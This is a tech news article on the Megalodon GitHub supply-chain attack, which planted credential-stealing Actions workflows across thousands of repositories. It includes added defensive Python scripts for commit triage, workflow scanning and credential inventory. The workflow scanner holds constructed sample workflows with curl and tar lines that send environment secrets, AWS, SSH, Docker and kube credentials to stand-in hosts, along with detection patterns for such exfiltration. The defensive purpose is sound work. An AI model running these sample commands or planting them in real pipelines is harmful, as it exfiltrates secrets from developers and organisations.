GitHub supply-chain attack Megalodon hits 5,561 repos in six hours

By Craig Nash
Tech writer at All Things Geek. Covers artificial intelligence, semiconductors, and computing hardware.

The Megalodon GitHub supply-chain attack represents one of the fastest and most coordinated assaults on open-source infrastructure ever recorded. On May 18, 2026, attackers pushed 5,718 malicious commits across 5,561 distinct repositories in roughly six hours, weaponizing GitHub Actions workflows to steal credentials, API keys, and authentication tokens from thousands of development environments.

Key Takeaways

  • 5,718 malicious commits targeted 5,561 GitHub repositories in a six-hour window on May 18, 2026
  • Attackers used GitHub Actions workflows to exfiltrate AWS credentials, GCP tokens, Azure credentials, SSH keys, and database connection strings
  • Over 33% of affected account usernames matched computers infected by infostealer malware, suggesting credential theft enabled the campaign
  • The attack was discovered after malicious versions of the Tiledesk open-source chat platform were published to npm
  • Dormant backdoors were planted in repositories, designed to trigger on pull requests and code pushes

How the Megalodon GitHub supply-chain attack unfolded

The GitHub supply-chain attack began at approximately 11:36 UTC on May 18 and was over by 17:48 UTC the same day, with automated malicious commits landing in repositories throughout a window of just over six hours. The first malicious commit was authored under a forged identity called “build-bot,” one of several fake personas (“auto-ci,” “ci-bot,” and “pipeline-bot” among them) chosen to blend in with legitimate CI/CD automation. SafeDep’s investigation found that 2,878 commits were tied to one author email address and 2,841 to a second, so two addresses account for effectively the entire 5,718-commit campaign.
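The combination this paragraph describes, bot-named authors, two email addresses behind thousands of commits, and a tight time window, is also what an incident responder would hunt for across an organization's repositories. The script below is an added example, not tooling from the article or from SafeDep. It reads a constructed tab-separated export (repository, commit, author name, author email, ISO timestamp, paths touched), which in practice would be assembled from each repository's git log, and reports commits that show at least two of three signals: a forged CI-bot author name, a change under .github/workflows/, or membership in a burst of commits from one address. The thresholds, the name pattern and the sample rows are assumptions.

```python
"""Triage a fleet-wide commit export for the pattern the Megalodon commits are
reported to share: forged CI-bot author names, a handful of author e-mail
addresses, a tight time window, and changes under .github/workflows/. Added
example, not tooling from the article or from SafeDep; the export format and
the rows below are constructed (a real export would be assembled from `git log`
per repository or from the organisation's audit log)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

BOT_NAME_RE = re.compile(r"^(?:build|auto|ci|pipeline|deploy|release)[-_]?(?:bot|ci)$", re.I)
WORKFLOW_DIR = ".github/workflows/"
BURST_WINDOW = timedelta(hours=1)   # assumed: this many commits by one address this close together is automation
BURST_MIN = 3
FLAG_MIN = 2                        # a commit is reported when at least this many signals fire

# repo, sha, author name, author e-mail, ISO-8601 author date, paths touched (constructed rows)
EXPORT = """\
org/api\ta1b2c3d\tbuild-bot\tbuild@example.invalid\t2026-05-18T11:36:02+00:00\t.github/workflows/build.yml
org/web\tb2c3d4e\tauto-ci\tbuild@example.invalid\t2026-05-18T11:36:09+00:00\t.github/workflows/ci.yml
org/cli\tc3d4e5f\tci-bot\tops@example.invalid\t2026-05-18T11:37:41+00:00\t.github/workflows/release.yml
org/docs\td4e5f6a\tAlice Example\talice@example.invalid\t2026-05-18T09:12:00+00:00\tREADME.md
org/api\te5f6a7b\tBob Example\tbob@example.invalid\t2026-05-18T12:05:33+00:00\tsrc/server.js;package.json
org/sdk\tf6a7b8c\tpipeline-bot\tops@example.invalid\t2026-05-18T11:38:05+00:00\t.github/workflows/pipeline.yml;package.json
org/infra\ta7b8c9d\tbuild-bot\tbuild@example.invalid\t2026-05-18T11:39:50+00:00\t.github/workflows/deploy.yml
org/web\tb8c9d0e\trenovate[bot]\trenovate@example.invalid\t2026-05-18T03:00:11+00:00\tpackage-lock.json
"""


def parse(export: str) -> list[dict]:
    rows = []
    for line in export.splitlines():
        repo, sha, name, email, when, paths = line.split("\t")
        rows.append({"repo": repo, "sha": sha, "name": name, "email": email,
                     "when": datetime.fromisoformat(when), "paths": paths.split(";")})
    return rows


def burst_members(rows: list[dict]) -> set[str]:
    """SHAs of commits that sit inside a BURST_WINDOW holding BURST_MIN+ commits by the same e-mail."""
    by_email = defaultdict(list)
    for r in rows:
        by_email[r["email"]].append(r)
    flagged = set()
    for commits in by_email.values():
        commits.sort(key=lambda r: r["when"])
        j = 0                                   # two-pointer sliding window over sorted times
        for i in range(len(commits)):
            while j < len(commits) and commits[j]["when"] - commits[i]["when"] <= BURST_WINDOW:
                j += 1
            if j - i >= BURST_MIN:
                flagged.update(r["sha"] for r in commits[i:j])
    return flagged


def triage(export: str) -> dict:
    rows = parse(export)
    in_burst = burst_members(rows)
    flagged = []
    for r in rows:
        reasons = []
        if BOT_NAME_RE.match(r["name"]):
            reasons.append("forged-ci-identity")
        if any(p.startswith(WORKFLOW_DIR) for p in r["paths"]):
            reasons.append("touches-workflows")
        if r["sha"] in in_burst:
            reasons.append("burst")
        if len(reasons) >= FLAG_MIN:
            flagged.append({**r, "reasons": reasons})
    flagged.sort(key=lambda r: r["when"])
    by_email = defaultdict(int)
    for r in flagged:
        by_email[r["email"]] += 1
    window = (flagged[0]["when"], flagged[-1]["when"]) if flagged else None
    return {"flagged": flagged, "by_email": dict(by_email), "window": window}


if __name__ == "__main__":
    result = triage(EXPORT)
    for r in result["flagged"]:
        print(r["when"].isoformat(), r["repo"], r["sha"], r["name"], r["email"], ",".join(r["reasons"]))
    print("senders:", result["by_email"], "window:", result["window"])
```

On the constructed rows the five bot-authored workflow commits are reported and the two human commits and the dependency bot are not; the "renovate[bot]" row shows why the name pattern is deliberately narrow. The by_email count is the figure to compare with SafeDep's two-address finding, and the window gives the start and end of the burst to pass to the next stage of the investigation.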

What made this GitHub supply-chain attack especially dangerous was where it aimed: rather than poisoning application code directly, the attackers targeted the build and deployment machinery itself. The malicious commits added GitHub Actions workflow files to the compromised repositories. Some were configured to trigger on every push and pull request, so they executed as soon as the commit landed and read whatever secrets and environment variables the CI runner had access to. Others were planted as dormant backdoors, doing nothing until a specific trigger event activated them.

Credentials harvested in the Megalodon GitHub supply-chain attack

The GitHub supply-chain attack was designed to cast the widest possible net for sensitive data. According to SafeDep, the exfiltrated credentials included CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, and GitLab CI/CD tokens. For any repository with automated builds, every credential the pipeline could reach was exposed within minutes of the malicious commit landing, because the commit itself was the push that started the workflow.
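Workflows of the kind described in the last two sections have a recognisable shape: an automatic trigger, a step that reads the runner environment, the secrets context or local credential files, and an outbound HTTP call to somewhere other than GitHub. The scanner below is an added example, not code from the article or from SafeDep; it encodes that shape as indicators over each workflow's run steps and separates the always-on variant from the dormant one by its trigger. The three sample workflows, the indicator list and the verdict names are constructed assumptions, and the example.invalid hosts do not exist.

```python
"""Flag GitHub Actions workflows that pair an automatic trigger with a step that
dumps the runner environment, the `secrets` context or local credential files and
sends them to a non-GitHub host, the shape reported for the Megalodon workflows.
Added example, not code from the article or SafeDep; the samples are constructed."""
import re

AUTO_TRIGGERS = {"push", "pull_request", "pull_request_target", "workflow_run"}
INDICATORS = [  # evaluated over each run: script
    ("secrets-dump", re.compile(r"toJSON\s*\(\s*secrets\s*\)", re.I)),
    ("env-dump", re.compile(r"(?<![\w.])(?:env|printenv)\s*(?:\||>|;|\)|$)", re.M)),
    ("cred-file-read", re.compile(r"(?:~|\$HOME)/\.(?:aws|ssh|docker|kube|npmrc|git-credentials|config/gcloud|azure)\b")),
    ("encoding", re.compile(r"\b(?:base64|xxd|gzip)\b")),
    ("exfil-http", re.compile(r"\b(?:curl|wget|Invoke-WebRequest|nc)\b[^\n]*https?://(?!(?:api\.)?github\.com)", re.I)),
]
GATHER = {"secrets-dump", "env-dump", "cred-file-read"}
RUN_RE = re.compile(r"^(?P<lead>\s*(?:-\s+)?)run:[ \t]*(?P<rest>.*)$")

def triggers(text: str) -> set[str]:
    """Event names under the top-level `on:` key (bare scalar, flow list or mapping)."""
    m = re.search(r"^on:[ \t]*(?P<inline>.*)$", text, re.M)
    if not m:
        return set()
    found, key_indent = set(re.findall(r"[A-Za-z_]+", m.group("inline"))), None
    for line in text[m.end():].splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if indent == 0:
            break                        # next top-level key ends the `on:` mapping
        key_indent = key_indent or indent
        km = re.match(r"([A-Za-z_]+):", line.strip())
        if km and indent == key_indent:  # direct children only, not branches:/types:
            found.add(km.group(1))
    return found

def run_scripts(text: str) -> list[str]:
    """Every `run:` script, inline or as a `|`/`>` block scalar."""
    lines, scripts, i = text.splitlines(), [], 0
    while i < len(lines):
        m, i = RUN_RE.match(lines[i]), i + 1
        if not m:
            continue
        rest = m.group("rest").strip()
        if rest and rest[0] not in "|>":
            scripts.append(rest)
            continue
        key_col, block = len(m.group("lead")), []
        while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > key_col):
            block.append(lines[i].strip())
            i += 1
        scripts.append("\n".join(block))
    return scripts

def scan_workflow(text: str) -> dict:
    """Classify one workflow: exfiltration | dormant-exfiltration | suspicious | clean."""
    hits, trig = {}, triggers(text)
    m = INDICATORS[0][1].search(text)    # toJSON(secrets) usually sits in an env: mapping, not a script
    if m:
        hits["secrets-dump"] = m.group(0)
    for script in run_scripts(text):
        for ind, rx in INDICATORS:
            m = rx.search(script)
            if m and ind not in hits:
                hits[ind] = m.group(0).strip()
    if GATHER & set(hits) and "exfil-http" in hits:
        # Gathers credentials and ships them out: on the next push if the trigger is automatic,
        # otherwise only when a schedule fires or an API-raised event such as repository_dispatch
        # arrives, which is the dormant-backdoor shape.
        verdict = "exfiltration" if trig & AUTO_TRIGGERS else "dormant-exfiltration"
    else:
        verdict = "suspicious" if hits else "clean"
    return {"verdict": verdict, "triggers": trig, "indicators": hits}

# Constructed samples: ordinary CI, the reported exfiltration shape, and the same payload
# parked behind repository_dispatch.
BENIGN = """\
on: [push, pull_request]
jobs:
  test:
    steps:
      - run: npm ci && npm test
"""
PLANTED = """\
on: [push, pull_request]
jobs:
  build:
    steps:
      - env:
          ALL: ${{ toJSON(secrets) }}
        run: |
          (env; cat ~/.aws/credentials ~/.ssh/id_*) | base64 -w0 \\
            | curl -s -X POST --data-binary @- https://collector.example.invalid/in
      - run: npm run build
"""
DORMANT = """\
on:
  repository_dispatch:
jobs:
  sync:
    steps:
      - run: tar czf - ~/.docker/config.json ~/.kube/config | curl -s -T - https://sync.example.invalid/up
"""
```

Run it over every file under .github/workflows/ in each repository and review anything that is not "clean". A legitimate workflow that uploads coverage with curl will come back "suspicious", which is the intended precision: the "exfiltration" verdicts need a credential-gathering indicator and an outbound call together, and the "dormant-exfiltration" verdict is what to look for when hunting for the backdoors the article says were left waiting for a trigger.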

Hudson Rock’s analysis uncovered a critical detail: the accounts used in the Megalodon GitHub supply-chain attack were, in its words, “exclusively sourced from infostealer data,” meaning the attackers bought or otherwise obtained credentials harvested from infected machines rather than running phishing or brute-force campaigns. Of 978 unique usernames tied to affected repositories, 331 (about a third) matched computers already known to be infected by infostealer malware. That overlap suggests the campaign was opportunistic: it went after whichever developers already had a compromised machine rather than a curated set of targets. The implication is harsh: if a developer’s personal computer is running credential-stealing malware, GitHub becomes an open door for supply-chain sabotage.

Discovery and the Tiledesk connection

Security researchers identified the Megalodon GitHub supply-chain attack after malicious versions of Tiledesk, an open-source live chat and chatbot platform, were published to npm between May 19 and May 21. The poisoned packages carried the backdoor code planted in Tiledesk’s repository during the May 18 commits, so anyone who installed them pulled the compromise straight into their own project. That the attack surfaced through the npm packages, rather than through detection of the GitHub-side intrusions, shows how much longer it could have run unnoticed had the poisoned releases not been caught.

Other repositories received the same malicious workflows, with the Black-Iron-Project and Tiledesk repositories the most heavily hit groups. Given that the accounts came from infostealer logs, the likeliest reading is that the attackers enumerated every repository each stolen account could push to and hit all of them, so the concentration in a few projects reflects which accounts they held rather than a hand-picked target list. Landing everything inside a six-hour window points to pre-staged automation and to a large pool of compromised accounts used simultaneously, so that the damage was done before defenders could respond.

Why infostealer-driven attacks represent a critical GitHub risk

Hudson Rock’s conclusion carries urgent implications: “The Megalodon campaign is a stark reminder that if developers and employees are infected with infostealers, platforms like GitHub become the launchpad for devastating cascading events”. Unlike a traditional account takeover, which often trips a login alert, infostealer logs typically contain the victim’s saved passwords together with session cookies and tokens, so the attacker’s access looks like the victim’s own device and the accounts can be driven at the speed of automation. A compromised developer account can push commits to every repository it can write to in minutes, and GitHub Actions will run the planted workflows across thousands of CI/CD pipelines before any human notices.

The GitHub supply-chain attack also exposes a gap in endpoint security. Many developers protect their GitHub accounts with two-factor authentication but neglect the machines where they keep SSH keys, API tokens, cached cloud credentials and logged-in browser sessions. An infostealer on that laptop harvests authentication material that is already valid, so no GitHub account setting can stop it from being replayed. This asymmetry, strong account security paired with weak endpoint hygiene, is exactly what the Megalodon campaign exploited.
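This is what the endpoint side of the problem looks like in practice, and the advice to assume local credentials are exposed becomes concrete once they are listed. The script below is an added example, not tooling from the article or from Hudson Rock: it inventories the plaintext credential files an infostealer harvests from a developer’s home directory (AWS keys, npm and GitHub CLI tokens, Docker registry logins, kubeconfig secrets, SSH keys without a passphrase) and builds a constructed home directory to run against. The file paths are the tools’ defaults; the detection patterns, the fake key helper and the sample contents are assumptions.

```python
"""Inventory the plaintext credential material on a developer workstation that an
infostealer would harvest: cloud keys, registry logins, tokens and passphrase-less
SSH keys. Added example, not tooling from the article or Hudson Rock. The paths are
the tools' defaults; `inventory()` takes a home directory so it can be run against
the constructed tree built by `demo_home()`."""
import base64
import json
import re
import struct
import tempfile
from pathlib import Path

# (relative path, description, pattern that shows a live secret is in the file)
FILE_CHECKS = [
    (".aws/credentials", "AWS long-lived access key", re.compile(r"^aws_secret_access_key\s*=", re.M)),
    (".npmrc", "npm publish/install token", re.compile(r"_authToken\s*=")),
    (".git-credentials", "git HTTPS password or PAT", re.compile(r"://[^/\s:]+:[^@\s]+@")),
    (".config/gh/hosts.yml", "GitHub CLI OAuth token", re.compile(r"oauth_token:")),
    (".kube/config", "kubeconfig with embedded key or token", re.compile(r"(client-key-data|token):")),
    (".netrc", ".netrc password", re.compile(r"^\s*password\s", re.M)),
]


def ssh_key_unencrypted(text: str) -> bool:
    """True when a private key file carries no passphrase. PEM keys advertise
    encryption in a header; OpenSSH-format keys name the cipher inside the blob."""
    if "ENCRYPTED" in text:
        return False
    if "BEGIN OPENSSH PRIVATE KEY" not in text:
        return "PRIVATE KEY" in text
    body = "".join(l for l in text.splitlines() if not l.startswith("-----"))
    blob = base64.b64decode(body)
    magic = b"openssh-key-v1\0"
    if not blob.startswith(magic):
        return False
    (n,) = struct.unpack(">I", blob[len(magic):len(magic) + 4])   # length-prefixed cipher name
    cipher = blob[len(magic) + 4:len(magic) + 4 + n]
    return cipher == b"none"


def inventory(home: Path) -> list[tuple[str, str]]:
    """Return (relative path, description) for every file holding usable credentials."""
    found = []
    for rel, desc, rx in FILE_CHECKS:
        p = home / rel
        if p.is_file() and rx.search(p.read_text()):
            found.append((rel, desc))
    docker = home / ".docker/config.json"
    if docker.is_file():
        auths = json.loads(docker.read_text()).get("auths", {})
        for registry, entry in auths.items():   # "auth" is base64(user:password); a credsStore entry is not
            if "auth" in entry:
                found.append((".docker/config.json", f"registry login for {registry}"))
    for key in sorted((home / ".ssh").glob("id_*")):
        if key.suffix != ".pub" and ssh_key_unencrypted(key.read_text()):
            found.append((f".ssh/{key.name}", "SSH private key without passphrase"))
    return found


def fake_openssh_key(cipher: bytes) -> str:
    """Constructed stand-in with only the header fields the check reads; no key material."""
    s = lambda b: struct.pack(">I", len(b)) + b
    blob = b"openssh-key-v1\0" + s(cipher) + s(b"none" if cipher == b"none" else b"bcrypt") + s(b"") + struct.pack(">I", 1)
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode() + "\n-----END OPENSSH PRIVATE KEY-----\n"


def demo_home() -> Path:
    """Build a constructed home directory with the kinds of files an infostealer targets."""
    home = Path(tempfile.mkdtemp())
    files = {
        ".aws/credentials": "[default]\naws_access_key_id = AKIAEXAMPLE\naws_secret_access_key = example\n",
        ".npmrc": "//registry.npmjs.org/:_authToken=npm_example\n",
        ".config/gh/hosts.yml": "github.com:\n    oauth_token: gho_example\n    user: dev\n",
        ".docker/config.json": json.dumps({"auths": {"ghcr.io": {"auth": base64.b64encode(b"dev:ghp_example").decode()},
                                                     "registry.example.invalid": {}}, "credsStore": "desktop"}),
        ".ssh/id_ed25519": fake_openssh_key(b"none"),
        ".ssh/id_rsa": fake_openssh_key(b"aes256-ctr"),
        ".ssh/id_ed25519.pub": "ssh-ed25519 AAAAC3example dev@laptop\n",
        ".kube/config": "apiVersion: v1\nusers:\n- name: dev\n  user:\n    exec:\n      command: kubelogin\n",
    }
    for rel, content in files.items():
        (home / rel).parent.mkdir(parents=True, exist_ok=True)
        (home / rel).write_text(content)
    return home


if __name__ == "__main__":
    for rel, desc in inventory(demo_home()):
        print(f"{rel}: {desc}")
```

Everything the script reports is something an infostealer copies in one pass and an attacker can use without touching GitHub’s login page. The constructed tree also shows the safe alternatives by omission: the passphrase-protected id_rsa, the registry that relies on a credential helper, and the kubeconfig that defers to an exec plugin are not listed.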

Frequently asked questions

What is the Megalodon malware campaign?

Megalodon is a coordinated GitHub supply-chain attack that pushed 5,718 malicious commits to 5,561 repositories on May 18, 2026, using forged CI/CD bot identities and stolen developer credentials to inject malicious GitHub Actions workflows. The workflows were designed to exfiltrate secrets from CI/CD environments and plant dormant backdoors in repositories.

How did the Megalodon GitHub supply-chain attack spread to npm?

The attack spread to npm when malicious commits in the Tiledesk repository were published as poisoned npm packages between May 19 and May 21, 2026. Any developer who installed the infected Tiledesk packages would have downloaded the backdoors planted during the May 18 GitHub assault, creating a downstream supply-chain propagation vector.

How can developers protect against infostealer-driven GitHub attacks?

Developers should assume that any credential stored on their local machine, including SSH keys, API tokens, cloud CLI credentials and logged-in browser sessions, can be taken by infostealer malware. Two-factor authentication on GitHub helps, but it does not protect a session or token that has already been stolen, so the critical steps are keeping endpoints patched and monitored, keeping secrets out of plain files (passphrases or hardware-backed storage for SSH keys, short-lived cloud credentials instead of long-lived keys), and never reusing credentials across systems. Organizations should audit the GitHub Actions workflows in their repositories, restrict who can modify CI/CD configuration (for example by requiring review for any change under .github/workflows/), keep the default GITHUB_TOKEN permissions read-only, and prefer short-lived OIDC-issued cloud credentials over long-lived keys stored as repository secrets, so that a hijacked workflow run has less to steal.

The Megalodon GitHub supply-chain attack shows that scale and speed now define supply-chain threats. When attackers hold hundreds of compromised developer accounts and use them all within a six-hour window, review-by-eye and after-the-fact alerting cannot keep up. That the campaign was found through poisoned npm packages rather than GitHub security alerts also suggests similar intrusions may already be sitting in other repositories, waiting to be discovered or weaponized. For development teams relying on open-source dependencies, the lesson is plain: supply-chain security begins with endpoint security, and credential theft is now a primary route to compromising GitHub itself.

Edited by the All Things Geek team.

Source: TechRadar
